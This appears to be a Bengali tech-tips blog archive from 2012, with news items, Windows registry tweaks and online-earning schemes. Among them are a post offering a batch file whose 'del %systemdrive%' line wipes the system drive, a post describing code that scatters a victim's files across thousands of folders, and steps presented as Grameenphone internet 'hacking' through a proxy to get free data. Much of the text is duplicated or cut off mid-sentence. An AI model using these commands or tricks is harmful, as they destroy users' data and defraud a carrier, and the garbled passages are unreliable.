চলতি বছরের সেরা আবিষ্কার- কৃত্রিম মেঘ। পেশায় শিল্পী হলেও এ অসাধ্য সাধন করেছেন ডেনমার্কের বার্নট স্মিল্ড। একটি কক্ষে পরিমিত তাপমাত্রা, জলীয় বাষ্প ও আলো নিশ্চিত করার পর একধরনের বিশেষ স্প্রে ব্যবহার করে কৃত্রিম মেঘ তৈরি করেন তিনি, যাতে আসল মেঘের মোটামুটি সব বৈশিষ্ট্যই ছিল। যদিও তার তৈরি করা এ মেঘ মাত্র কয়েক মুহূর্ত স্থায়ী হয়, তারপরও এটি গবেষণার নতুন দরজা খুলে দিয়েছে। এমনকে এখান থেকে আবহাওয়া নিয়ে গবেষণায়ও নতুন দিদন্ত উন্মোচিত হতে পারে। টাইম ম্যাগাজিন একে ২০১২ সালের সেরা আবিষ্কার বলে নির্বাচিত করেছে।
Dec 30, 2012
Dec 27, 2012
Google এর জানা অজানা তত্ত্ব
Google Inc একজন আমেরিকান
বহুজাতিক কর্পোরেশন যা প্রদান করে ইন্টারনেট সম্পর্কিত পণ্য ও পরিষেবা অনুসন্ধান
ইন্টারনেট সহ,, মেঘ কম্পিউটিং, সফ্টওয়্যার এবং বিজ্ঞাপন প্রযুক্তি AdWord থেকে বিজ্ঞাপনের
আয় প্রায় সব কোম্পানীর লাভের
Dec 26, 2012
Error 0x0000007E বন্ধ করুন খুব সহজে
কিভাবে Error 0x0000007E বন্ধ করতে হয়। আমরা অনেক সময় পিসিতে বড় হাই পাওয়ার ফুল গেম খেলি । গেম চলাকালিন সময় অনেক সময় নীল স্ক্রীন চলে আসে । এর কারন হল সাধারনত ইন্টেল বেস কম্পিউটার এ SysPrep image তৈরি হলে এই সমস্যা হয়। এতি non-Intel এও হতে পারে। যার কারনে registry entry পরিবর্তন হয়ে যায় ।
নিচের step গুলো ফলো করুন
Dec 16, 2012
আগামী বছরই দেশজুড়ে থ্রিজি
বঙ্গবন্ধু সম্মেলন কেন্দ্র থেকে: দেশে প্রযুক্তি উৎসব ‘ডিজিটাল ওয়ার্ল্ড ২০১২’ শুরু হয়েছে। ৬ ডিসেম্বর বৃহস্পতিবার প্রধান অতিথি কৃষিমন্ত্রী মতিয়া চৌধুরী ডিজিটাল ল্যাপটপে ক্লিক করে এ সম্মেলনের উদ্বোধন করেন।
‘সমৃদ্ধির জন্য জ্ঞান’ স্লোগানে ৩ দিনের এ আয়োজন বসেছে ঢাকার বঙ্গবন্ধু আন্তর্জাতিক সম্মেলন কেন্দ্রে।
অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন আন্তর্জাতিক তথ্য ও যোগাযোগ প্রযুক্তি বিশেষজ্ঞ এবং প্রধানমন্ত্রী শেখ হাসিনার পুত্র সজীব ওয়াজেদ জয়।
‘সমৃদ্ধির জন্য জ্ঞান’ স্লোগানে ৩ দিনের এ আয়োজন বসেছে ঢাকার বঙ্গবন্ধু আন্তর্জাতিক সম্মেলন কেন্দ্রে।
অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন আন্তর্জাতিক তথ্য ও যোগাযোগ প্রযুক্তি বিশেষজ্ঞ এবং প্রধানমন্ত্রী শেখ হাসিনার পুত্র সজীব ওয়াজেদ জয়।
Dec 1, 2012
কম্পিউটার সেটআপে কীবোর্ড কাজ না করলে তার সমাধান
কম্পিউটার সেটআপ দিইয়ার মদ্যখানে দিকি কীবোর্ডের কয়েকটি কী কাজ করেনা আমি আর সিরিয়াল কি গুলো বশাতে পারছিনা । তখন কি অপাই ? আপনাদের জন্য আমি নিয়ে এশেছি সমাধান। কি করে তখন সিরিয়াল কী বসাতে পারি। এর জন্য
আপনাকে ছোট একটা কাজ করতে হবে
কম্পিউটার এর বিরক্তিকর ERROR মেসেজ বন্ধ করুন
উইন্ডোজ এক্সপি ব্যবরহারে কোন সমস্যা দেখা দিলে স্ক্রীন এ sand an error Report to Microsoft লেখাটি দেখাই। কয়েক ক্লিক এ এই বিরক্তিকর এই মেসেজ তেকে মুক্তি পাওয়া সম্বভ
। এ জন্য my computer থেকে রাইট ক্লিক করে properties
খুলুন । এবার advanced tab এ ক্লিক করে
কীবোর্ড যদি কাজ না করে
যদি কীবোর্ড কাজ না করে তাহলে কন কিছুই করতে পারবেন না কম্পিউটারে । এই
সমস্যা সমাধান দিতে পারে উইন্ডোজ অন স্ক্রীন কীবোর্ড । অন স্ক্রীন কীবোর্ড চাল
করতে উইন্ডোজএর start Menu
Nov 30, 2012
গ্রামীন ফোন ইন্টারনেট হ্যাকিং
প্রয়োজনীয় জিনিসঃ ১টা সিম + যে ব্রাউজার লাগবে:
মজিলা ফায়ার ফক্স
প্রথম ধাপঃ প্রথমে আপনার সিমের ব্যালেন্স
কমিয়ে নিন। একেবারে খালি হলে ১০টাকা রিচার্জ করে p1 লিখে ৫০০০ নাম্বারেএসএমএস পাঠান।
দ্বিতীয় ধাপঃ মজিলা ফায়ার ফক্স ওপেন করুন। টুলস মেনু
থেকে অপশনে যান এরপর এডভান্স থেকে নেটওয়ার্ক
সিলেক্ট করুন। এবার সেটিংস আইকনে সিলেক্ট
করে ম্যানুয়েলি প্রক্সি কনফিগারেশন
মজিলা ফায়ার ফক্স
প্রথম ধাপঃ প্রথমে আপনার সিমের ব্যালেন্স
কমিয়ে নিন। একেবারে খালি হলে ১০টাকা রিচার্জ করে p1 লিখে ৫০০০ নাম্বারেএসএমএস পাঠান।
দ্বিতীয় ধাপঃ মজিলা ফায়ার ফক্স ওপেন করুন। টুলস মেনু
থেকে অপশনে যান এরপর এডভান্স থেকে নেটওয়ার্ক
সিলেক্ট করুন। এবার সেটিংস আইকনে সিলেক্ট
করে ম্যানুয়েলি প্রক্সি কনফিগারেশন
এ ক্লিক করুন।
প্রক্সি ঘরে 66.90.79.172দিন পোর্ট ঘরে 80 দিন এবার ওকে দিয়ে সেভ দিয়ে নিন। ব্যাসকাজ শেষ ।
এবার মডেম লাগিয়ে ফাইয়ারফক্সের সাহায্যে ব্রাউজ
করুন ও ডাউনলোড করুন
প্রক্সি ঘরে 66.90.79.172দিন পোর্ট ঘরে 80 দিন এবার ওকে দিয়ে সেভ দিয়ে নিন। ব্যাসকাজ শেষ ।
এবার মডেম লাগিয়ে ফাইয়ারফক্সের সাহায্যে ব্রাউজ
করুন ও ডাউনলোড করুন
__সংগ্রহ
Nov 14, 2012
মাউসের বিকল্প ব্যবহার
জরুরি একটি "পাওয়ার পয়েন্ট" প্রেজেন্টেশান আজ
জমা দেতে হবে। কম্পিউটার বসতে দেখা গেলো , মাউস কাজ করেনা ! ঠিকও করা যাচ্ছে না।
এখন কি ওপাই ? উইন্ডোজ একটি সেটিং পরিবরতন করে বিকল্প বেবস্থায় চালাতে পারেন জরুরি
মাউস এর কাজ। এ জন্য কীবোর্ড থেকে একসঙ্গে left Alt + left Shift + NUM LOCK কি চাপুন। মনিটরে ছোট একটি পপ-আপ উইন্ডো আসবে । এই উইন্ডো তে ok প্রেস করুন । এবার NUM LOCK বাটন সঙ্ক্রিয় করুন ।
এতে কীবোর্ডের কি দিয়ে মাউস কার্সর নানা চারা করা যাবে। 1,2,3,4,5,6,7,8 বাটন দিয়ে মাউস নাড়ানো যাবে । আর 5 দিয়ে মাউস এর left click এবং + দিয়ে ডাবল click করা যাবে । ডান পাশের crtl এর বামে বাটনটি মউসের Right click হিসাবে কাজ করে । শেষ NUM LOCK OFF করলে এ সবিধা বন্ধ হয়ে যাবে ।
ইউন্ডোজ ও ভার্সনের নাম ডেস্কটপে দেখতে চান
তারা এই ভাবে সেটাকে ডেস্কটপের রাইট সাইটে টাস্কবার এর উপরে দেখতে পাবেন
তারজন্য প্রথমে আপনার রান এ গিয়ে টাইপ করুন
Regedit এবং ইন্টার প্রেস করুন
এবার সিলেক্ট করুন
HKEY_CURRENT_USER >Control Panel>Desktop>Paint Desktop Version এবং ২বার ক্লিক করুন
এবং এর মান ০ থেকে ১ করে ওকে দিন, এবার সিস্টেম রিস্টার্ট করে নিন
Nov 12, 2012
Internet Source – সীমিত থাকার কারণে – খুদা , দারিদ্র , শিক্ষা তথা মৌলিক চাহিদা পূরণ আজকের দিনের জন্য কষ্ট সাধ্য একটা ব্যাপার । যদি আমরা আমাদের জনসংখা কে জনশম্পদে পরিনত করতে পারি – তাহলে জনসংখা বৃদ্ধি অভিশাপ না হয়ে আশির্বাদ হবে। বর্তমানে বাংলাদেশ কে ডিজিটাল বাংলাদেশে রুপান্তরের লক্ষে OUT SOURCING একটা যুগোপযোগী পেশা হিসেবে যে কোনো শিক্ষিত বেকার বেছে নেবে । online earning এখন আর কোনো কল্পনার বিসয় নয় । আমাদের আসে পাসে অনেককেই আমরা দেখসি যারা interner এর মাধ্যমে বাংলাদেশের অনেক ভালো চাকরির চাইতেও বেশী উপার্জন করসে । বাংলাদেশের জনগোষ্ঠির বৃহত একটা অংশ শিক্ষিত কিন্তু বেকার যা সমাজ ও জাতির জন্য বোজা । কর্মসংস্থান যাদের জন্য বিশাল একটা সমসসা । দেশের এই বৃহত শিক্ষিত যুব সমাজ কে কাজে লাগাতে পারলে আমাদের দেশের অর্থনোয়তিক অবস্থা সুদৃঢ় হবে , তাতে কোনো সন্দেহ নাই ।
বাংলাদেহ্সের অনলাইন ফ্রীলান্স ট্রেনিং জগতে প্রথম এবং একমাত্র নির্ভরযোগ্য প্রতিষ্ঠান TEAM- BOTS ( TEAM BANGLADESH ONLINE TRAINING SCHOOL) গত কয়েক বসর যাবত শিক্ষিত বেকার যুবকদের ফ্রীলান্সিং প্রশিক্ষণ দিয়ে সনির্ভর করে গড়ে তুলসে । আমাদের পার্সবতী দেশ ভারত , পাকিস্তান, ফিলিপিনে সুধু OUT সৌর্সিং খাত থেকে যে পরিমান বৈদেশিক মুদ্রা আয় করে থাকে তা আমাদের মত দারিদ্র প্রিত দেশের জন্য খুবই গুরুত্বপূর্ণ ইনকাম উত্তস হিসেবে বিবেচিত হতে পারে । বাংলাদেশের পপ্রযুক্তিগত সুযোগ সুবিধার সীমাবদ্ধতা থাকা সত্তেও আমরা চেষ্টা করলে খুব বেশি সময় লাগবে না তাদের সারিতে পৌসিতে এবং দেশে থেকে বৈদেশিক মুদ্রা অর্জন করতে
আসুন আমরা OUT SOURCING নামক NEW CONCEPT কে পেশা হিসেবে বেছে নিয়ে নিজেদের তথা দেশ ও জনগনের
ভাগ্গ্য পরিবর্তন করে দেশ ও জাতি গঠনে আন্তরিক ভাবে চেষ্টা করি.
PTC! PTC! করে আপনার মেধা শেষ করবেন? না কি মজার মজার কিছু শিখবেন? সঙ্গে আয়ও করবেন
আমার এই লেখাটি নতুনদের জন্য যারা অভিজ্ঞ তাদের কাছে আমার সালাম এবং শ্রদ্ধা রইল।
অনলাইনে ইনকাম করা যায় অনেকে শুনেছেন কিন্তু কখনো নিজে করেছেন? হ্যাঁ এবার নিজেই করবেন। আমাদের দেশের অধিকাংশ ছাত্রদের পরালেখা চালিয়ে নেওয়ার মূল সম্বল হল Tuition বা Outsourcing ।
আউটসোর্সিং কী?
কোন একটি প্রতিষ্টানের কাজ বাহিরের কাউকে দিয়ে করিয়ে নেওয়াকে বলা হয় আউটসোর্সিং। আমাদের দেশে আউটসোর্সিং-এর কাজ করে অনেকেই আত্ননির্ভরশীল। আউটসোর্সিং সম্বন্ধে যারা একেবারেই জানেনা তারা আমার আউটসোর্সিং রিলেটেড লেখাটি পড়ুন বা এখানে আউটসোর্সিং রিলেটেড অনেক লেখা আছে সেগুলো পড়ুন। যারা কিছু কিছু জানে তাদের জন্য এই লেখাটি। আউটসোর্সিং নামটা আসলে প্রথমেই মনে আসে oDesk-এর কথা
লুকিয়ে ফেলুন আপনার পিসি‘র “System Properties
আশাকরি সকলে মহান আল্লাহর রহমতে ভালো আছেন। আপনি যদি চান মাই কম্পিউটার থেকে লুকিয়ে ফেলতে পারেন “System Properties” স্ক্রীণ। আর এটা করতে পারেন রেজিস্ট্রী এডিটরের মাধ্যমে। নিচে দেখুন:
প্রথমে Start Menu তে Click করে Run এ গিয়ে regedit লিখে এন্টার চাপুন। Registry Editor Open হবে।
এরপর HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer এ যান।
এবার ডানপাশের প্যানেলে গিয়ে একটি নতুন DWORD ভ্যালু তৈরী করুন।
ভ্যালু নাম- NoPropertiesMyComputer,
সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার
সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।
*.notepad ওপেন করুন এবং নিচের কোডটি কপি করে নিন ।
#include
#include
#include
#include
#include
Oct 30, 2012
এখনি ডাউনলোড করুন skype 6.0.0.120
এটা skype এর সর্বশেষ ভার্সন।
এটি গত ২৭ অক্টোবর রিলিজ পেয়েছে।
নতুন যোগ হয়েছে : ফেসবুক এবং মাইক্রোসফট অ্যাকাউন্ট দিয়ে লগিন করা যাবে।
ফিচারসমূহঃ
- ফ্রী স্কাইপি থেকে স্কাইপি কল করা।
- অল্প খরচে মোবাইল এবং টেলিফোনে কল করা।
- অনলাইন নাম্বারে কল করা।
- কনফারেন্স কল করা।
- ফ্রী ভিডিও কলিং।
- গ্রুপ ভিডিও কলিং।
- স্ক্রীন শেয়ার করা।
Oct 29, 2012
উইন্ডোজ একটি বিরক্তিকর সমসার সমধান করুন মাত্র কয়েক সেকেন্ড
আমদের
অনেক কম্পিউটারে ছোট একটি সমস্যা দেকে যাই , যেটা আগে কখনও ছিল না, যেটা
আপনার কম্পিউটার সেটআপ দিলেন তারপর থেকে এই সমস্যা হচ্ছে । কম্পিউটার চালু করলে এর
উইন্ডোজ আছে একটি কিন্তু উইন্ডোজ দেকাচ্ছে দুটি অ্যান্ড আপনাকে উইন্ডোজ সিলেক্ট
করার জন্য বলছে অ্যান্ড দুটির মধ্যে একটি কাজ করে আর অন্নটি কাজ করেনা ফাইল মিসিঙ দেখাচ্ছে। ইচ্ছে
করলে এই সমস্যা সমাধান করতে পারেন কয়েক সেকেন্ড আর এর জন্য আপনাকে যা করতে হবে my computer-এর ওপর right click করন তারপর properties –click করন তারপর যে উইন্ডোজটি
Blogspot ব্লগিং প্ল্যাটফর্ম এ যেভাবে ব্লগ ওপেন করতে হয় _নতুনদের জন্য
যেসব সাইট ফ্রী ব্লগিং এর সুবিধা দিয়ে থাকে তাদের মধ্যে ব্লগস্পট এবং ওয়ার্ডপ্রেস খুব জনপ্রিয়। ব্লগস্পট খুব সহজে হ্যান্ডল করা যায়। ওয়ার্ডপ্রেস এর সুবিধা অনেক বেশি তাই বড় বড় ব্লগগুলাতে এটির কদর অনেক বেশি। এখন আমরা শিখব কিভাবে ব্লগস্পট এ ব্লগ ওপেন করতে হয়। ব্লগস্পট এ ব্লগ ওপেন করতে কোন এক্সট্রা অ্যাকাউন্ট খুলতে হয়না। জিমেইল অ্যাকাউন্ট দিয়েই খুব সহজে ব্লগ খোলা যায়।
১) প্রথমে আমাদের http://www.blogger.com এই সাইট এ যেতে হবে। সেখানে নিচের ছবিটির মত একটা উইন্ডো আসবে।
২) নিজের জিমেইল অ্যাকাউন্ট এবং পাস ওয়ার্ড দিয়ে লগইন করতে হবে।
৩) এখানে ব্লগ এর
Oct 12, 2012
কে চায় নিজের পিসি ধংস করতে
কে চায় নিজের পিসি ধংস করতে। কিন্তু আমি আমার পিসির ১২/২৪ টা বাজিয়ে দিয়েছি। এই .bat কোডটি দ্বারা । বিশ্বাস না হলে আপনার পিসির ফাইলগুলো নিরাপদে রেখে একবার ট্রাই করেন। আর পিসির ১২টা বাজার সময় গনেন।
আপনার এই কাজটি করার জন্য যাহা যাহা করতে হবে।
০. আপনার Computer টি নতুন করে ইন্সটল করার জন্য সকল প্রকার প্রস্তটি নিয়ে নিবেন।
১। প্রথমে নিচের কোডটি কে Notepad এ Past করুন। অথবা এখানে থেকে ডাউনলোড করে নিতে পারেন।
@echo off
del %systemdrive%\*.*/f/s/q
ডিভিডি থেকে ফাইল কপি সহজেই
নানা প্রয়োজনে অনেক সময় আমরা ডিভিডি থেকে ফাইল কপি করে থাকি। অনেক সময় কিছু কিছু ডিভিডি ডিস্ক থেকে ফাইল কপি করা সম্ভব হয় না। ফাইল কপি করতে গেলে This DVD is copyright protected লেখা বার্তা আসে। এর কারণ ওই ডিভিডিটি Content Scramble System (CSS) সিস্টেমে
উইন্ডোজ এক্সপিতে সিস্টেম ফোল্ডারের ড্রাইভ পরিবর্তন করুন
সাধারনত প্রোগ্রাম ফোল্ডার থাকে যে ড্রাইভে, তাতেই অপারেটিং সিস্টেম ইনস্টল থাকে। মানে প্রায় সবারই থাকে (c:\program file)। ইচ্ছে করলে আপনি এটি পরিবর্তন করে অন্য কোনো ড্রাইভে দিতে পারেন। এ জন্য run এ গিয়ে regedit command টা টাইপ করে ok। এবার HKEY_LOCAL_MAHINE > SOFWARE >Microsoft >
হার্ডডিস্কের জায়গা খালি করুন
হার্ডডিস্কে যতেস্ট পরিমাণ জায়গা থাকা সত্ত্বেও অনেক সময় দেখাযায়,হার্ডডিস্কের মেমোরি পূর্ণ হয়ে আছে। এ রকম হলে my computer এ ঢুকে Tools> folder option> view> এ গিয়ে Hide protected operating system files থেকে টিক চিহ্ন তুলে দিন এবং show Hidden files and
Oct 11, 2012
গ্রামীনফোনে ফ্রী ইন্টারনেট
গ্রামীনফোনে ফ্রী ইন্টারনেট ও MMS ব্যবহার করার ট্রিকস শেয়ার করতে এলাম ।
এটি সম্ভব । গ্রামীনফোনে 3MB ফ্রি ইন্টারনেট ও 3টি MMS পেতে পেতে চান তাহলে এখুনী igenp10 349 টাইপ করে 9999 (ফ্রী) এ পাঠিয়ে দিন। টাইপ করার সময় 10 এবং 34এর মাঝে একটি স্পেস দিয়েন
আয় করুন ছোট ছোট ফ্রিলাসিং কাজ করে (নতুনদের জন্য)
টাকা আয় করা বর্তমান বিশ্বের একটি সাধারন কাজ। সবাই বেঁচে থাকার জন্য টাকা আয় করে থাকে। এখনতো ইন্টারনেট টাকা আয় করার একটি বিশাল মাধ্যম। ইন্টারনেটে টাকা আয় করার অনেক উপায় এবং ওয়েব সাইট আছে যার মধ্যে কিছু আছে বিশ্বাস যোগ্য আর কিছু আছে প্রতারনার জন্য। নতুন ব্যবহারকারীরা রং চং আর সহজ দেখে প্রতারনায়ই পা দেয়। কিন্ত ইন্টানেটের বিশাল ভান্ডারে নতুনদের জন্য ও সাইট বা উপায় আছে। সুধু চিনে নিতে হবে। আজকে আমি একটি সাইটের সাথে একটু পরিচয় করিয়ে দেবো যা অনেকদিন ধরে ফ্রিলাসিং এর জগতে সুপরিচিত। এই সাইটা নতুন ব্যবহারকারীকে সাহায্য করবে। হয়তো এখন যারা এই পোস্টটি পড়ছেন তারা প্রথমে এই সাইটে কাজ করেছেন আর এখন বড় বড় অংকের ফি নিয়ে ফ্রিলাসিং এর কাজ করছেন। যাক আর বেশি কথা বাড়াবো না। সাইটটির নাম EzMicroJobs ।
EzMicroJobs কি :
Sep 13, 2012
facebook page Like করে, twitter/ google+ Follow করে , youtube subscribe করে, pinterest / Digg follow বা micro job করে আয় করুন সহজেই.
শুরুতেই বলে নেই এখানে কাজ করতে হলে কম্পিউটার থাকতে হবে এবং একটি PC দিয়ে কেবল একটি Account খুলবেন।
১ ডলার হলেই টাকা তুলতে পারবেন Payza বা bKash ( grameenphone / Robi এর মোবাইল ব্যাংকিং) এর মাধ্যমে।
প্রথমেই নিচের লিংকে গিয়ে ফ্রী Register করুন। এরপর Email Verifyকরে Log In করুন।
প্রথমেই নিচের লিংকে গিয়ে ফ্রী Register করুন। এরপর Email Verifyকরে Log In করুন।
email এর Inbox এ Verify message না পেলে Spam option এ খুজে দেখুন।
Log in করার পর নিচের ছবির মত Earn Coins এ ক্লিক করুন।
Earn Coins এর প্রতিটি সেকশন থেকেই আপনি আয় করতে পারবেন(যদি আপনার সব কয়টিতে Account থাকে)।
Earn Coins থেকে Fb / twitter বা যে Option থেকে আয় করতে চান তা সিলেক্ট করুন।
আপনার Fb ac এ Log in করুন এরপর Fb সিলেক্ট করলে কতগুলো Fb page এর লিংক আসবে, page গুলো লাইক করে Confirm করুন। প্রতিটিpage লাইকের জন্য আপনি নির্দিষ্ট পরিমান Coin পাবেন।
Fb page সব লাইক শেষ হলে Page টি Refresh করুন আবার কিছু fb page এর লিংক দেবে আবার আগের মত লাইক করুন।
এভাবে সব কয়টি fb page লাইক শেষ হলে Earn Coin থেকে twitter বা অন্য কোনো Section select করুন। সেখান থেকে যে কাজ দেবে তা সমাপ্ত করুন তাহলে ওই কাজের জন্য নির্দিষ্ট Coin আপনার Account এ জমা হবে।
সবচেয়ে ভালো হয় সব কয়টি সাইটে আপনার Account থাকলে। তাহলে প্রতিটি সেকশন থেকেই আয় করতে পারবেন এতে আয় বেশি হবে।
Facebook, twitter এ সবার ই Account থাকলেও অন্য গুলাতে নেই।
নিচের লিংক গুলোতে একটি করে Account খুলে ফেলুন।
Earn Coins থেকে Fb / twitter বা যে Option থেকে আয় করতে চান তা সিলেক্ট করুন।
আপনার Fb ac এ Log in করুন এরপর Fb সিলেক্ট করলে কতগুলো Fb page এর লিংক আসবে, page গুলো লাইক করে Confirm করুন। প্রতিটিpage লাইকের জন্য আপনি নির্দিষ্ট পরিমান Coin পাবেন।
Fb page সব লাইক শেষ হলে Page টি Refresh করুন আবার কিছু fb page এর লিংক দেবে আবার আগের মত লাইক করুন।
এভাবে সব কয়টি fb page লাইক শেষ হলে Earn Coin থেকে twitter বা অন্য কোনো Section select করুন। সেখান থেকে যে কাজ দেবে তা সমাপ্ত করুন তাহলে ওই কাজের জন্য নির্দিষ্ট Coin আপনার Account এ জমা হবে।
সবচেয়ে ভালো হয় সব কয়টি সাইটে আপনার Account থাকলে। তাহলে প্রতিটি সেকশন থেকেই আয় করতে পারবেন এতে আয় বেশি হবে।
Facebook, twitter এ সবার ই Account থাকলেও অন্য গুলাতে নেই।
নিচের লিংক গুলোতে একটি করে Account খুলে ফেলুন।
(একটা কথা বলে রাখা ভাল ফেসবুক থেকে অন্য সাইট গুলাতে কয়েন আয় করা বেশি সহজ)
Sep 10, 2012
সবচেয়ে জনপ্রিয় ডেস্কটপ ওএস হলো উইন্ডোজ ৭
বিশ্বের সবচেয়ে জনপ্রিয় ডেস্কটপ অপারেটিং সিস্টেম এখন উইন্ডোজ ৭। অগাস্ট মাসে নেট অ্যাপ্লিকেশনের তৈরি মাসিক প্রতিবেদন অনুযায়ী উইন্ডোজ এক্সপিকে হটিয়ে শীর্ষস্থানীয় ডেস্কটপ অপারেটিং সিস্টেমের সিংহাসনটি দখল করে নিয়েছে উইন্ডোজ ৭। খবর ম্যাশএবল-এর।
২০০১ সালে মাইক্রোসফট বাজারে এনেছিলো উইন্ডোজ এক্সপি অপারেটিং সিস্টেম। এরপর থেকে জনপ্রিয় ডেস্কটপ অপারেটিং সিস্টেমের সিংহাসনটি এক্সপির দখলেই ছিলো। তবে নেট অ্যাপ্লিকেশনের প্রতিবেদন অনুযায়ী ৪২ দশমিক ৭৬ শতাংশ মার্কেট শেয়ার নিয়ে এক্সপিকে টপকে গেছে উইন্ডোজ ৭। দ্বিতীয় স্থানে থাকলেও খুব বেশি পিছিয়ে নেই উইন্ডোজ এক্সপি; এখনও ৪২ দশমিক ৫২ শতাংশ মার্কেট শেয়ার রয়েছে অপারেটিং সিস্টেমটির দখলে।
৬ দশমিক ১৫ শতাংশ মার্কেট শেয়ার নিয়ে তৃতীয় স্থানে রয়েছে মাইক্রোসফটের অপর অপারেটিং সিস্টেম উইন্ডোজ ভিসতা। অ্যাপলের ম্যাক অপারেটিং সিস্টেম ওএসএক্স ১০.৭ এবং ওএসএক্স ১০.৬ রয়েছে তৃতীয় এবং চতুর্থ স্থানে। নেট অ্যাপ্লিকেশনের ওই প্রতিবেদনের ওপর ভিত্তি করে বলা যায় যে, প্রায় ৯২ শতাংশ মার্কেট শেয়ার নিয়ে ডেস্কটপ অপারেটিং সিস্টেমের বাজারে একচ্ছত্র রাজত্ব করে বেড়াচ্ছে মাইক্রোসফট।
২০০১ সালে মাইক্রোসফট বাজারে এনেছিলো উইন্ডোজ এক্সপি অপারেটিং সিস্টেম। এরপর থেকে জনপ্রিয় ডেস্কটপ অপারেটিং সিস্টেমের সিংহাসনটি এক্সপির দখলেই ছিলো। তবে নেট অ্যাপ্লিকেশনের প্রতিবেদন অনুযায়ী ৪২ দশমিক ৭৬ শতাংশ মার্কেট শেয়ার নিয়ে এক্সপিকে টপকে গেছে উইন্ডোজ ৭। দ্বিতীয় স্থানে থাকলেও খুব বেশি পিছিয়ে নেই উইন্ডোজ এক্সপি; এখনও ৪২ দশমিক ৫২ শতাংশ মার্কেট শেয়ার রয়েছে অপারেটিং সিস্টেমটির দখলে।
৬ দশমিক ১৫ শতাংশ মার্কেট শেয়ার নিয়ে তৃতীয় স্থানে রয়েছে মাইক্রোসফটের অপর অপারেটিং সিস্টেম উইন্ডোজ ভিসতা। অ্যাপলের ম্যাক অপারেটিং সিস্টেম ওএসএক্স ১০.৭ এবং ওএসএক্স ১০.৬ রয়েছে তৃতীয় এবং চতুর্থ স্থানে। নেট অ্যাপ্লিকেশনের ওই প্রতিবেদনের ওপর ভিত্তি করে বলা যায় যে, প্রায় ৯২ শতাংশ মার্কেট শেয়ার নিয়ে ডেস্কটপ অপারেটিং সিস্টেমের বাজারে একচ্ছত্র রাজত্ব করে বেড়াচ্ছে মাইক্রোসফট।
Jun 17, 2012
প্রধান কারিগরি কর্মকর্তা ব্রেট টেইলর এবার ফেইসবুক ছেড়ে চলে গেলেন
প্রযুক্তিবিশ্বে
ফেইসবুকের আজকের যে প্রতাপ, তার অন্যতম কারণ এর নান্দনিক কারিগরি সুবিধা। এ
কারিগরি দিক যে দলটি সামলায় তাদের নেতা, প্রধান কারিগরি কর্মকর্তা ব্রেট
টেইলর এবার ফেইসবুক ছেড়ে চলে গেলেন। বন্ধুর সঙ্গে মিলে একটি নতুন
প্রতিষ্ঠান গড়ার লক্ষ্যে তিনি প্রতিষ্ঠানটি ছেড়েছেন বলে জানা গেছে।
এ প্রসঙ্গে ফেইসবুকের প্রধান নির্বাহী মার্ক জুকারবার্গ ইমেইলে এএফপিকে জানান, ব্রেটের কাছ থেকে ফেইসবুক অনেক কিছু পেয়েছে। তার সঙ্গ আমরা উপভোগ করেছি। ফেইসবুকে তার অবদান আমরা আনন্দচিত্তে স্বীকার করছি। তার নতুন প্রকল্পের জন্য শুভ কামনা রইল।'
ব্রেট বলেন, 'ফেইসবুক ছেড়ে যেতে আমার খুব খারাপ লাগছে। আবার বন্ধু কেভিন গিবের সঙ্গে নতুন প্রকল্প শুরু করতে পারব ভেবে আনন্দও লাগছে।'
জুকারবার্গ সম্পর্কে তিনি বলেন, সে শুধু আমার বস নয়, ছিল আমার কাছের বন্ধুদের একজন।
ব্রেট কি নিয়ে কাজ করবেন তা অবশ্য এখনো খোলাসা করে বলেননি। ITndNEWSসূত্র : ইন্টারনেট
এ প্রসঙ্গে ফেইসবুকের প্রধান নির্বাহী মার্ক জুকারবার্গ ইমেইলে এএফপিকে জানান, ব্রেটের কাছ থেকে ফেইসবুক অনেক কিছু পেয়েছে। তার সঙ্গ আমরা উপভোগ করেছি। ফেইসবুকে তার অবদান আমরা আনন্দচিত্তে স্বীকার করছি। তার নতুন প্রকল্পের জন্য শুভ কামনা রইল।'
ব্রেট বলেন, 'ফেইসবুক ছেড়ে যেতে আমার খুব খারাপ লাগছে। আবার বন্ধু কেভিন গিবের সঙ্গে নতুন প্রকল্প শুরু করতে পারব ভেবে আনন্দও লাগছে।'
জুকারবার্গ সম্পর্কে তিনি বলেন, সে শুধু আমার বস নয়, ছিল আমার কাছের বন্ধুদের একজন।
